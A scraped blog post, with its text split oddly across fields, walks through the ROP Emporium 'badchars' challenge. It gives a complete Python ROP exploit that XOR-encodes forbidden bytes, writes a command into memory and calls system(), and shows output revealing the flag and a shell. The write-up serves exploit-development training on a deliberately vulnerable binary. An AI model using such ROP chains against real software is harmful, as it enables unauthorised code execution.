\nhttps:\/\/ropemporium.com\/challenge\/badchars.html<\/a><\/p>\n
This challenge is actually not much more difficult than the previous (write4). The only difference is that now you have to account for characters that either get mutated when they’re written to memory or just aren’t written at all. The binary has already done the hardest part for you, providing the useful gadgets. I didn’t even need to use The hardest part of this challenge was writing the Python script.<\/p>\n Solution:<\/p>\n Running the exploit:<\/p>\n And in case you’d like to change the string to give you a shell (e.g. “bash”):<\/p>\n This script is far from perfect. For instance, it doesn’t check the addresses for bad characters, only the string. Perhaps I’ll improve it in the future.<\/p>\n I’m also not going to provide a detailed explanation of everything the script is doing. I’ve tried to provide enough comments for this. Also, your knowledge from the previous challenges should be enough to understand it.<\/p>\n","protected":false},"excerpt":{"rendered":"ropper<\/code>:<\/p>\n![\"\"](\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2019\/11\/badchars_usefulGadgets.png\")
<\/p>\n\r\n#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\nimport random\r\n\r\n\r\ndef write_string(string, location, badchars):\r\n global payload\r\n indices = []\r\n for i, char in enumerate(string):\r\n if chr(char) in badchars:\r\n indices.append(i)\r\n\r\n if indices:\r\n key = random.randint(1, 127)\r\n\r\n # This will XOR only the badchars with the key\r\n for i in indices:\r\n string = string[:i] + (int(string[i]) ^ key).to_bytes(1, "big") + string[i+1:]\r\n payload += (0x400b40).to_bytes(8, "little") # pop r14; pop r15; ret\r\n payload += (key).to_bytes(8, "little")\r\n payload += (location+i).to_bytes(8, "little")\r\n payload += (0x400b30).to_bytes(8, "little") # xor byte [r15], r14b; ret\r\n\r\n # Run the string through again to make sure there are no badchars\r\n return write_string(string, location, badchars)\r\n\r\n # Add a null terminator if it doesn't already exist\r\n if string[-1]:\r\n string += b"\\x00"\r\n\r\n # This is what puts the XOR'd string into memory\r\n for i in range(0, len(string), 8):\r\n # Add null byte padding to make sure the string len is a multiple of 8\r\n if len(string[i:i+8]) < 8:\r\n string += b"\\x00" * (8 - len(string[i:i+8]))\r\n payload += (0x400b3b).to_bytes(8, "little") # pop r12; pop r13; ret\r\n payload += string[i:i+8]\r\n payload += (location + i).to_bytes(8, "little")\r\n payload += (0x400b34).to_bytes(8, "little") # mov qword [r13], r12; ret\r\n\r\n # Need to reverse the order of operations in the payload (32-bytes at a time)\r\n payload = b"".join(reversed([payload[i:i+32] for i in range(0, len(payload), 32)]))\r\n\r\n return string\r\n\r\n\r\n# NOTE: This string cannot have a bad char in the 4th position (e.g. "\/bin\/sh" or "cat flag.txt")\r\n# In the .data section (0x601070), the 4th position is 0x73, which is a bad char\r\ncommand = " cat flag.txt"\r\nlocation = 0x601070\r\n# This can be either a list or dict (with the chars as the keys)\r\nbadchars = { " ": 0x20, "\/": 0x2f, "b": 0x62, "c": 0x63,\r\n "f": 0x66, "i": 0x69, "n": 0x6e, "s": 0x73 }\r\n\r\npayload = b""\r\nwrite_string(command.encode(), location, badchars)\r\n\r\npayload = (b"A" * 40) + payload\r\n\r\n# Execute the command\r\npayload += (0x400b39).to_bytes(8, "little") # pop rdi; ret;\r\npayload += (location).to_bytes(8, "little") # Address of where the string is saved to\r\npayload += (0x4006f0).to_bytes(8, "little") # PLT address of system()\r\n\r\nsys.stdout.buffer.write(payload)\r\n<\/pre>\n\r\nandrew ~\/badchars $ .\/exploit.py | .\/badchars \r\nbadchars by ROP Emporium\r\n64bits\r\n\r\nbadchars are: b i c \/ <space> f n s\r\n> ROPE{a_placeholder_32byte_flag!}\r\n<\/pre>\n\r\nandrew ~\/badchars $ (.\/exploit.py; echo; cat) | .\/badchars \r\nbadchars by ROP Emporium\r\n64bits\r\n\r\nbadchars are: b i c \/ <space> f n s\r\n> id\r\nuid=1000(andrew) gid=1000(andrew) groups=1000(andrew),1001(sudo)\r\ncat flag.txt\r\nROPE{a_placeholder_32byte_flag!}\r\n<\/pre>\n